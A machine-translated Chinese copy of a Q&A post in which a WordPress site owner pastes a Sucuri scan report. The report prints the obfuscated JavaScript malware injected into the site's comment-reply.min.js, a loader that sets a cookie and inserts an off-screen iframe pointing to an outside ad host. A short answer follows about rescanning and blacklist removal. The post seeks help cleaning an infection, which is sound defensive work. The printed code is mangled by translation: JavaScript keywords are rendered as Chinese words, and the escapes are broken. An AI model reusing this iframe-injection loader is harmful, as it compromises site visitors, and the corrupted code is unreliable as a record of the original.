Sucuri.net-报告攻击页面。如何解决?

时间:2015-11-07 12:06:57

标签: javascript wordpress malware safe-browsing

我的WordPress网站被Google阻止为恶意网站。经过大量研究,我找到了Sucuri并进行了扫描:

https://sitecheck.sucuri.net/results/www.zuzu.com

问题列出如下:

ISSUE DETECTED-网站恶意软件

DEFINITION- mwjs-iframe -jected530?web.js.malware.pwframe.001

感染网址http://www.zuzu.com/wp-includes/js/comment-reply.min.js?ver=f1397b4577f4eac1e6712291231852a5

有效负载:

已知的JavaScript恶意软件。详情:http://labs.sucuri.net/db/malware/mwjs-iframe-injected530?web.js.malware.pwframe.001 var _0xdc56 = [" \ x6F \ x6E \ X6C \ x6F \ X61 \ 64"" \ X67 \ X65 \ X74 \ X44 \ X61 \ X74 \ X65"" \ X73 \ X65 \ X74 \ X44 \ X61 \ X74 \ X65"" \ X63 \ x6F \ x6F \ X6B \ X69 \ X65"" \ X3D"&#34 ; \ X3B \ X20 \ X65 \ X78 \ X70 \ X69 \ X72 \ X65 \ X73 \ X3D"" \ X74 \ x6F \ X55 \ X54 \ X43 \ X53 \ X74 \ X72 \ X69 \ x6E \ X67"""" \ X3D \ X28 \ x5B \ x5E \ X3B \ X5D \ X29 \ x7B \ X31 \ X2C \ x7D"" \ X65 \ X78 \ X65 \ X63"" \ X73 \ X70 \ X6C \ X69 \ X74"" \ X61 \ 64 \ X2D \ X63 \ x6F \ x6F \ X6B \ X69 \ X65& #34;" \ X65 \ X72 \ X32 \ X76 \ 64 \ X72 \ X35 \ X67 \ 64 \ X63 \ X33 \ 64 \ X73"" \ 64 \ X69 \ X76&#34 ;," \ X63 \ X72 \ X65 \ X61 \ X74 \ X65 \ X45 \ X6C \ X65 \ X6D \ X65 \ x6E \ X74"" \ X68 \ X74 \ X74 \ X70 \ X3A \ X2F \ X2F \ X73 \ X74 \ X61 \ X74 \ X69 \ X63 \ X2E \ X74 \ X72 \ X79 \ X6D \ X79 \ X66 \ X69 \ x6E \ X67 \ X65 \ X72 \ X2E \ X77 \ X65 \ X62 \ X73 \ X69 \ X74 \ X65 \ X2F \ X61 \ 64 \ X2F \ X3F \ X69 \ 64 \ X3D \ X36 \ X39 \ X34 \ X33 \ X36 \ X33 \ X31 \ X26 \ X6B \ X65 \ X79 \ X77 \ x6F \ X72 \ 64 \ X3D"" \ X26 \ X61 \ 64 \ X76 \ X65 \ X72 \ X74 \ X3D \ X55 \ X48 \ X68 \ X75 \ X79 \ X34"" \ X69 \ x6E \ x6E \ X65 \ X72 \ X48 \ X54 \ x4D \ x4C"" \ X3C \ 64 \ X69 \ X76 \ X20 \ X73 \ X74 \ X79 \ X6C \ X65 \ X3D \ X27 \ X70 \ x6F \ X73 \ X69 \ X74 \ X69 \ x6F \ x6E \ X3A \ X61 \ X62 \ X73 \ x6F \ X6C \ X75 \ X74 \ X65 \ X3B \ X7A \ X2D \ X69 \ x6E \ 64 \ X65 \ X78 \ X3A \ X31 \ X30 \ X30 \ X30 \ X3B \ X74 \ x6F \ X70 \ X3A \ X2D \ X31 \ X30 \ X30 \ X30 \ X70 \ X78 \ X3B \ X6C \ X65 \ X66 \ X74 \ X3A \ X2D \ X39 \ X39 \ X39 \ X39 \ X70 \ X78 \ X3B \ X27 \ x3E \ X3C \ X69 \ X66 \ X72 \ X61 \ X6D \ X65 \ X20 \ X73 \ X72 \ X63 \ X3D \ X27"&# 34; \ X27 \ x3E \ X3C \ X2F \ X69 \ X66 \ X72 \ X61 \ X6D \ X65 \ x3E \ X3C \ X2F \ 64 \ X69 \ X76 \ x3E"" \ X61 \ X70 \ X70 \ X65 \ x6E \ 64 \ X43 \ X68 \ X69 \ X6C \ 64"" \ X62 \ x6F \ 64 \ X79"];窗口[_0xdc56 [0]] =函数(){函数 _0x739ex1(_0x739ex2,_0x739ex3,_0x739ex4){if(_0x739ex4){var _0x739ex5 = new Date(); _ 0x739ex5_0xdc56 [2];}; if(_0x739ex2&& _0x739ex3){document [_0xdc56 [3]] = _ 0x739ex2 + _0xdc56 [ 4] + _ 0x739ex3 +(_ 0x739ex4?_0xdc56 [5] + _ 0x739ex5_0xdc56 [6]:_ 0xdc56 [7])} else {return false};} function _0x739ex6(_0x739ex2){var _0x739ex3 = new RegExp(_0x739ex2 + _0xdc56 [8]); VAR _0x739ex4 = _0x739ex3_0xdc56 [9]; if(_0x739ex4){_ 0x739ex4 = _0x739ex4 [0] _0xdc56 [10]} else {return false}; return _0x739ex4 [1]?_ 0x739ex4 [1]:false;} var _0x739ex7 = _0x739ex6(_0xdc56 [11]);如果(!_0x739ex7 = _ 0xdc56 [12]){_ 0x739ex1(_0xdc56 [11],_ 0xdc56 [12],1);无功 _0x739ex8 = document_0xdc56 [14]; var _0x739ex9 = 925365; var _0x739exa = _0xdc56 [15] + _ 0x739ex9 + _0xdc56 [16]; _ 0x739ex8 [_0xdc56 [17]] = _ 0xdc56 [18] + _ 0x739exa + _0xdc56 [19];文档[_0xdc56 [21]] _ 0xdc56 [20];};};

删除此恶意软件后,我需要做些什么?

1 个答案:

答案 0 :(得分:1)

Sucuri Sitecheck只显示缓存的响应。它存储扫描24小时。结果底部有一个小链接,您可以单击以强制重新扫描。它现在显示的是该网站仍被列入黑名单。

你可以使用=> https://sucuri.net/website-security/google-blacklisted-my-website了解删除黑名单的一些信息和步骤。如果您有任何疑问,请随时联系Sucuri。